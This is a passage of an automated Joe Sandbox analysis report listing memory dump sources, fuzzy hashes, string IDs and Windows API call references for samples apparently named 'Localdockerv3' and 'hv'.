                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C67C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C695000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C6BA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C6CF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C6F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C6FF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C703000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C707000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C70B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553940938.000000006C70F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553983544.000000006C713000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1554011564.000000006C71B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1554033542.000000006C71F000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_6c2d0000_hv.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: #214
                                                                                                        • String ID: Link$Rect$Subtype
                                                                                                        • API String ID: 1405426997-3862875103
                                                                                                        • Opcode ID: 07c31f49a76f62a774412e0fade39dbd6468ce4c36497ead7aaa774628cd0e1d
                                                                                                        • Instruction ID: 6908530c43a9202f4557a500cc378f189c57f7f2c519f48be75e69507abce52f
                                                                                                        • Opcode Fuzzy Hash: 07c31f49a76f62a774412e0fade39dbd6468ce4c36497ead7aaa774628cd0e1d
                                                                                                        • Instruction Fuzzy Hash: 4551B3317012198FDF00CF68CA946AEB7B5FF58708B140269D856ABB41DB72ED05CFA1
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.2171334550.0000000140001000.00000020.00000001.01000000.0000000D.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.2171292207.0000000140000000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_140000000_Localdockerv3.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _cwprintf_s_l
                                                                                                        • String ID:
                                                                                                        • API String ID: 2941638530-0
                                                                                                        • Opcode ID: 09fd3be6d87d3314e842234ac9bfaaf60286fd91aaa6fe79aa6a6f993e03e53e
                                                                                                        • Instruction ID: f5fd568eb4fa89ef09741f301376edfd5dbb115e4928b6f7acd597c23f9de95b
                                                                                                        • Opcode Fuzzy Hash: 09fd3be6d87d3314e842234ac9bfaaf60286fd91aaa6fe79aa6a6f993e03e53e
                                                                                                        • Instruction Fuzzy Hash: 56E1B633205A8086E7628B7AE8553DD33A0F789BB4F444302E7A99B6F2DE7DD4858740
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.2171334550.0000000140001000.00000020.00000001.01000000.0000000D.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.2171292207.0000000140000000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_140000000_Localdockerv3.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _cwprintf_s_l
                                                                                                        • String ID: 0$@
                                                                                                        • API String ID: 2941638530-1545510068
                                                                                                        • Opcode ID: 11cc51ba024c335070304a6cd7586fed144db14e9716be4ba93d075a169ea3cb
                                                                                                        • Instruction ID: f515dbf1d49814e9e3407b6919e0efcb9013ed6d199b989b111f9ff7d72fbfb8
                                                                                                        • Opcode Fuzzy Hash: 11cc51ba024c335070304a6cd7586fed144db14e9716be4ba93d075a169ea3cb
                                                                                                        • Instruction Fuzzy Hash: AFE16B722146C48BE765CF66E8447DEB7A0F3C8B84F548115EB8957B68CB39D865CF00
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.2171334550.0000000140001000.00000020.00000001.01000000.0000000D.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.2171292207.0000000140000000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_140000000_Localdockerv3.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _cwprintf_s_l
                                                                                                        • String ID: H$P
                                                                                                        • API String ID: 2941638530-457946424
                                                                                                        • Opcode ID: 3236d887c71168098ea76fec8f1f99091adbadb1fc60211c25e4cae7499078e8
                                                                                                        • Instruction ID: 20116706675992dc0dd6a543d8b96af0499e673c97be450d8ca5d57fafb5b745
                                                                                                        • Opcode Fuzzy Hash: 3236d887c71168098ea76fec8f1f99091adbadb1fc60211c25e4cae7499078e8
                                                                                                        • Instruction Fuzzy Hash: 28B1A272215A4182EA62DB2AE8417EA7360FB8DBF4F444212AF6D476F5DF78C845CB40
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.2171334550.0000000140001000.00000020.00000001.01000000.0000000D.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.2171292207.0000000140000000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_140000000_Localdockerv3.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $ $ $ $ $ $ $ $ $!$"$" D$)$-$:$:$D$F$\$_$_$a$a$a$a$a$a$b$b$c$c$c$d$d$d$e$e$e$e$e$e$e$e$f$g$g$g$g$g$g$h$i$i$i$l$l$m$m$n$n$n$n$o$o$o$o$o$p$p$p$p$p$r$r$r$r$r$r$s$s$s$t$t$t$t$u$u$u$u$y
                                                                                                        • API String ID: 0-1553105431
                                                                                                        • Opcode ID: b62bcd70555ecac178921fb69db0b916aa94a9461a52cd8312cf5ed454835745
                                                                                                        • Instruction ID: 983b50228ff67007349c82ebe3df00fbbaa8400b1fc6e134e4c4d14ededc4b65
                                                                                                        • Opcode Fuzzy Hash: b62bcd70555ecac178921fb69db0b916aa94a9461a52cd8312cf5ed454835745
                                                                                                        • Instruction Fuzzy Hash: BAD1042210C7C0C9E722C739E45839BBF91E396758F084149A7D84BAEACBBFD454CB61
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.2171334550.0000000140001000.00000020.00000001.01000000.0000000D.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.2171292207.0000000140000000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_140000000_Localdockerv3.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: .$2$3$D$I$K$P$b$d$e$e$e$e$e$e$g$g$l$l$l$n$n$r$r$r$s$s$t$u
                                                                                                        • API String ID: 0-1371980272
                                                                                                        • Opcode ID: 83936a6e60971807bd9a841582d71c7bc9abb7deebbfde0675ab1a4d8166ddc1
                                                                                                        • Instruction ID: ebb7062b7830e2f6201c3ee88f5bab5457eb83f6b9f17b420c99f5bab9962169
                                                                                                        • Opcode Fuzzy Hash: 83936a6e60971807bd9a841582d71c7bc9abb7deebbfde0675ab1a4d8166ddc1
                                                                                                        • Instruction Fuzzy Hash: 8C41542210C7C085F752C769E40435ABFD1D796BA8F080159A7D90B6EACBFFC448CB21
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.2171334550.0000000140001000.00000020.00000001.01000000.0000000D.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.2171292207.0000000140000000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_140000000_Localdockerv3.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: .$.$/$/$:$a$e$f$h$k$o$o$p$r$s$t$t$t$w$w$w$w
                                                                                                        • API String ID: 0-3163616504
                                                                                                        • Opcode ID: aab7ac65e11725551885da5ed400cf90207c0651e7c005d705e4ff692bcd86c7
                                                                                                        • Instruction ID: 605818b88a422d67cb553fba9621f2b72a2fa53064d5ecd022150907ca5edf59
                                                                                                        • Opcode Fuzzy Hash: aab7ac65e11725551885da5ed400cf90207c0651e7c005d705e4ff692bcd86c7
                                                                                                        • Instruction Fuzzy Hash: 5481913220868086E752CB3AE8487DD77A5F389BD8F584215F79C476BACB7DC949CB10
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.2171334550.0000000140001000.00000020.00000001.01000000.0000000D.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.2171292207.0000000140000000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_140000000_Localdockerv3.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 7$:$M$h$l$m$m$s$t
                                                                                                        • API String ID: 0-774144524
                                                                                                        • Opcode ID: b7f5465834f6e590c0bbed4cce9958aad9cdde72733777f65dba2b1614c7fcd9
                                                                                                        • Instruction ID: 78b4388999416cd18bfcb0f14d0a6cd4aa7666f392b8eb34da5cf203a5b0034f
                                                                                                        • Opcode Fuzzy Hash: b7f5465834f6e590c0bbed4cce9958aad9cdde72733777f65dba2b1614c7fcd9
                                                                                                        • Instruction Fuzzy Hash: 99E1B432208A8481EB62DF66E4443ED77A5F788BD4F548116EB4A5F7B8CF7AC884C741
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.1820890807.000000006C426000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C370000, based on PE: true
                                                                                                        • Associated: 00000009.00000002.1820865224.000000006C370000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1820890807.000000006C371000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1820890807.000000006C37A000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1820890807.000000006C4B4000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1820890807.000000006C4E3000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1820890807.000000006C4E7000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1820890807.000000006C4F6000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C5DA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C5FB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C605000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C672000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C686000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C68B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C68E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C69B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C6CF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C706000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C71C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C735000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C75A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C76F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C794000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C7A3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C7A7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C7AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1825551368.000000006C7AF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1825601329.000000006C7B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1825636765.000000006C7BB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1825668062.000000006C7BF000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_6c370000_hv.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: #214
                                                                                                        • String ID: Link$Rect$Subtype
                                                                                                        • API String ID: 1405426997-3862875103
                                                                                                        • Opcode ID: 8fc95c778f80179e43c526f8de443ea39d1e17619e10805c7733a772d62acdb7
                                                                                                        • Instruction ID: 9001b9e776958e42f57630e008eb6bcd7e5e34e65f12def1ac016b318cc51885
                                                                                                        • Opcode Fuzzy Hash: 8fc95c778f80179e43c526f8de443ea39d1e17619e10805c7733a772d62acdb7
                                                                                                        • Instruction Fuzzy Hash: E0C10331B0121D9FDF14DF68C894DAEB7B5EF89218B50002AD816AB781DF30AD09CBA1
                                                                                                        APIs
                                                                                                        • #73.IEPDF32(?), ref: 6C44D777
                                                                                                          • Part of subcall function 6C44CEE0: #70.IEPDF32(?,?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 6C44CEEB
                                                                                                        • #73.IEPDF32(?), ref: 6C44D80A
                                                                                                        • #73.IEPDF32(00000000,?,?,Rect), ref: 6C44D915
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.1820890807.000000006C426000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C370000, based on PE: true
                                                                                                        • Associated: 00000009.00000002.1820865224.000000006C370000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1820890807.000000006C371000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1820890807.000000006C37A000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1820890807.000000006C4B4000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1820890807.000000006C4E3000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1820890807.000000006C4E7000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1820890807.000000006C4F6000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C5DA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C5FB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C605000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C672000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C686000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C68B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C68E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C69B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C6CF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C706000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C71C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C735000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C75A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C76F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C794000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C7A3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C7A7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C7AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1825551368.000000006C7AF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1825601329.000000006C7B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1825636765.000000006C7BB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1825668062.000000006C7BF000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_6c370000_hv.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: BBox$Rect
                                                                                                        • API String ID: 0-3854271352
                                                                                                        • Opcode ID: f4cc5b151381497d025b84d08c1a24e7c3ed6422dc2a38c4ab73612931429f2b
                                                                                                        • Instruction ID: 845ada3ecd92e9026a1491ab08feeac04a1e7c925678495765e0a5a027b7ce86
                                                                                                        • Opcode Fuzzy Hash: f4cc5b151381497d025b84d08c1a24e7c3ed6422dc2a38c4ab73612931429f2b
                                                                                                        • Instruction Fuzzy Hash: 27C1E871B012099FEB14DF65CC90EAEB7B5FF89714F204528E959ABB40DB30E905CBA1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.1820890807.000000006C426000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C370000, based on PE: true
                                                                                                        • Associated: 00000009.00000002.1820865224.000000006C370000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1820890807.000000006C371000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1820890807.000000006C37A000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1820890807.000000006C4B4000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1820890807.000000006C4E3000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1820890807.000000006C4E7000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1820890807.000000006C4F6000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C5DA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C5FB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C605000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C672000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C686000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C68B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C68E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C69B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C6CF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C706000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C71C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C735000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C75A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C76F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C794000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C7A3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C7A7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C7AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1825551368.000000006C7AF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1825601329.000000006C7B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1825636765.000000006C7BB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1825668062.000000006C7BF000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_6c370000_hv.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Annot$Type
                                                                                                        • API String ID: 0-395718979
                                                                                                        • Opcode ID: 21732b869bcfffffa66e00acb4bb8b8ed9666215e896b565aa469c2a62ee84b3
                                                                                                        • Instruction ID: a628ba9c5b3909a8847bb77c4ccbfd904e51f8a6ea1066eb591d22f18a05202c
                                                                                                        • Opcode Fuzzy Hash: 21732b869bcfffffa66e00acb4bb8b8ed9666215e896b565aa469c2a62ee84b3
                                                                                                        • Instruction Fuzzy Hash: 1AB1D275B002198FFB14CF65C890EAEB7B5FF89305F108969D959ABB40EB309D06CB91
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.1820890807.000000006C426000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C370000, based on PE: true
                                                                                                        • Associated: 00000009.00000002.1820865224.000000006C370000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1820890807.000000006C371000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1820890807.000000006C37A000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1820890807.000000006C4B4000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1820890807.000000006C4E3000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1820890807.000000006C4E7000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1820890807.000000006C4F6000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C5DA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C5FB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C605000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C672000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C686000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C68B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C68E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C69B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C6CF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C706000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C71C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C735000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C75A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C76F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C794000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C7A3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C7A7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C7AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1825551368.000000006C7AF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1825601329.000000006C7B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1825636765.000000006C7BB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1825668062.000000006C7BF000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_6c370000_hv.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 05dcd975d80199fa8ef3c21e251dca6b5d8c2ff4c516a222f2ca923243a9ea18
                                                                                                        • Instruction ID: 25571dfb8656054cd84d7cdcbc80763cd2451335b623a6c12dda77e7019ee50b
                                                                                                        • Opcode Fuzzy Hash: 05dcd975d80199fa8ef3c21e251dca6b5d8c2ff4c516a222f2ca923243a9ea18
                                                                                                        • Instruction Fuzzy Hash: 4A81C131B017198FDB00DF79C880F6AB7B5AF89215F504629EA15ABB40EB30E855CBA1
                                                                                                        APIs
                                                                                                        • SetStretchBltMode.GDI32(00000000,00000004), ref: 6C42FC9B
                                                                                                        • GetObjectType.GDI32(?), ref: 6C42FCA4
                                                                                                        • CreateBitmap.GDI32 ref: 6C42FCD3
                                                                                                        • SelectObject.GDI32(?,00000000), ref: 6C42FCDD
                                                                                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 6C42FCFD
                                                                                                        • SelectObject.GDI32(?,00000000), ref: 6C42FD21
                                                                                                        • DeleteObject.GDI32(00000000), ref: 6C42FD28
